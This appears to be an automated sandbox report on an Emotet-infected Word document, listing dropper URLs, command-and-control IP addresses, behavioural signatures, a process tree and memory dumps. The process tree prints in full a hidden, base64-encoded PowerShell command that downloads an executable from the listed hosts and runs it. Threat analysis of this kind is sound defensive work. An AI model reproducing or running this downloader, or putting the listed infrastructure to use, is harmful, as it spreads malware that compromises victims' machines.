Analysis

  • max time kernel
    150s
  • resource
    win7v191014
  • submitted
    13-12-2019 19:59

General

  • Target

    Docs_7fd7b14acff688e84b811d03e1831552.60.doc

  • Sample

    191213-x8e4j9vjxx

  • SHA256

    57fd6973ae1ee5bc249420f5bfae5737bc4c9cbbf0caac146194044d390f9efc

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://kaikeline.com/1B/

exe.dropper

http://irpot.com/css/jRk5gg/

exe.dropper

http://kartcup.net/picture_library/eqop/

exe.dropper

http://lakelass.com/cgi-bin/2dhm/

exe.dropper

http://ouimet.biz/cgi-bin/l/

Extracted

Family

emotet

C2

73.214.99.25:80

179.13.185.19:80

186.67.208.78:8080

37.59.24.177:8080

66.34.201.20:7080

108.179.206.219:8080

45.56.88.91:443

218.44.21.114:80

75.80.148.244:80

31.31.77.83:443

212.129.24.79:8080

12.229.155.122:80

91.73.197.90:80

206.81.10.215:8080

128.65.154.183:443

108.191.2.72:80

144.139.247.220:80

181.57.193.14:80

169.239.182.217:8080

2.38.99.79:80

rsa_pubkey.plain

Signatures

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Drops file in System32 directory 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Modifies registry class 136 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_7fd7b14acff688e84b811d03e1831552.60.doc"
    1⤵
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    PID:844
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABKAGQAZwB5AHQAbABnAHEAbgB0AHUAPQAnAFcAaABiAGsAYwB6AGEAaQBxAHIAZwBuACcAOwAkAE8AYwB3AHkAcAB5AGQAeABtAGoAagBnAGUAIAA9ACAAJwAxADYAJwA7ACQAWQBrAG4AdABkAGoAbwBpAHQAcAA9ACcASABsAGoAZQB2AGcAaQBhAGYAaAAnADsAJABUAHUAeQBjAHgAeABsAHoAbgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATwBjAHcAeQBwAHkAZAB4AG0AagBqAGcAZQArACcALgBlAHgAZQAnADsAJABGAHkAZgBzAG0AegBsAHQAPQAnAFMAZABmAGEAbwBsAGkAeQBpAHYAbgBuACcAOwAkAFUAYgBkAGwAaQB0AHcAcwBnAGwAaABzAGMAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4AZQB0AC4AdwBlAGIAYwBMAGkARQBOAHQAOwAkAFgAcwBjAGsAeAB5AGcAegBoAG4AcwB1AHMAPQAnAGgAdAB0AHAAOgAvAC8AawBhAGkAawBlAGwAaQBuAGUALgBjAG8AbQAvADEAQgAvACoAaAB0AHQAcAA6AC8ALwBpAHIAcABvAHQALgBjAG8AbQAvAGMAcwBzAC8AagBSAGsANQBnAGcALwAqAGgAdAB0AHAAOgAvAC8AawBhAHIAdABjAHUAcAAuAG4AZQB0AC8AcABpAGMAdAB1AHIAZQBfAGwAaQBiAHIAYQByAHkALwBlAHEAbwBwAC8AKgBoAHQAdABwADoALwAvAGwAYQBrAGUAbABhAHMAcwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvADIAZABoAG0ALwAqAGgAdAB0AHAAOgAvAC8AbwB1AGkAbQBlAHQALgBiAGkAegAvAGMAZwBpAC0AYgBpAG4ALwBsAC8AJwAuACIAUwBgAFAATABpAFQAIgAoACcAKgAnACkAOwAkAEgAbQBrAGcAcgBvAGgAcQBsAGoAbwBmAGUAPQAnAFUAZAB2AHAAbgB0AGcAegB1AHIAeAByAGcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEIAeQBsAHgAcABrAG4AcAB3AGwAZQBtACAAaQBuACAAJABYAHMAYwBrAHgAeQBnAHoAaABuAHMAdQBzACkAewB0AHIAeQB7ACQAVQBiAGQAbABpAHQAdwBzAGcAbABoAHMAYwAuACIARABgAG8AYAB3AE4ATABvAEEAZABGAGAASQBMAGUAIgAoACQAQgB5AGwAeABwAGsAbgBwAHcAbABlAG0ALAAgACQAVAB1AHkAYwB4AHgAbAB6AG4AKQA7ACQAUQByAGUAaABsAGEAbwBlAD0AJwBNAGIAcgB3AG0AagBnAG4AYwAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFQAdQB5AGMAeAB4AGwAegBuACkALgAiAGwARQBuAGAAZwBgAFQASAAiACAALQBnAGUAIAAzADAANwA4ADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AGEAYABSAFQAIgAoACQAVAB1AHkAYwB4AHgAbAB6AG4AKQA7ACQAWQBnAGQAYQBtAHEAbwB1AHcAYQBxAGkAPQAnAEEAdwBqAHcAZgB6AHQAZwBhAHIAcABjAGgAJwA7AGIAcgBlAGEAawA7ACQARABlAGwAbAB5AHQAeABlAGsAbgB5AD0AJwBMAG0AawBpAGMAcQBpAGoAZQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAHkAcgBnAG0AbABrAGkAZwBkAD0AJwBGAHgAdgBjAGMAcwB5AGoAZwBqAGwAdgBvACcA
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    PID:108
    • C:\Users\Admin\16.exe
      "C:\Users\Admin\16.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      PID:1792
      • C:\Users\Admin\16.exe
        --9b97a9af
        3⤵
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        PID:1304
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1881317576550991269-7651052519046183392044447755-650160409-1423590481578062281"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:788
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k WerSvcGroup
    1⤵
      PID:1960
    • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
      "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
      1⤵
        PID:1760
      • C:\Windows\SysWOW64\xclinbox.exe
        "C:\Windows\SysWOW64\xclinbox.exe"
        1⤵
        • Suspicious use of WriteProcessMemory
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        PID:520
        • C:\Windows\SysWOW64\xclinbox.exe
          --203455b7
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Drops file in System32 directory
          • Suspicious use of SetWindowsHookEx
          • Executes dropped EXE
          • Suspicious behavior: EmotetMutantsSpam
          PID:992

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/520-13-0x0000000000520000-0x0000000000537000-memory.dmp

        Filesize

        92KB

      • memory/844-1-0x000000000624E000-0x0000000006252000-memory.dmp

        Filesize

        16KB

      • memory/844-2-0x0000000009030000-0x0000000009034000-memory.dmp

        Filesize

        16KB

      • memory/844-3-0x000000000624E000-0x0000000006252000-memory.dmp

        Filesize

        16KB

      • memory/844-4-0x000000000624E000-0x0000000006252000-memory.dmp

        Filesize

        16KB

      • memory/844-0-0x0000000006150000-0x0000000006154000-memory.dmp

        Filesize

        16KB

      • memory/992-16-0x0000000000400000-0x0000000000451000-memory.dmp

        Filesize

        324KB

      • memory/1304-10-0x0000000000240000-0x0000000000257000-memory.dmp

        Filesize

        92KB

      • memory/1304-11-0x0000000000400000-0x0000000000451000-memory.dmp

        Filesize

        324KB

      • memory/1792-7-0x00000000003C0000-0x00000000003D7000-memory.dmp

        Filesize

        92KB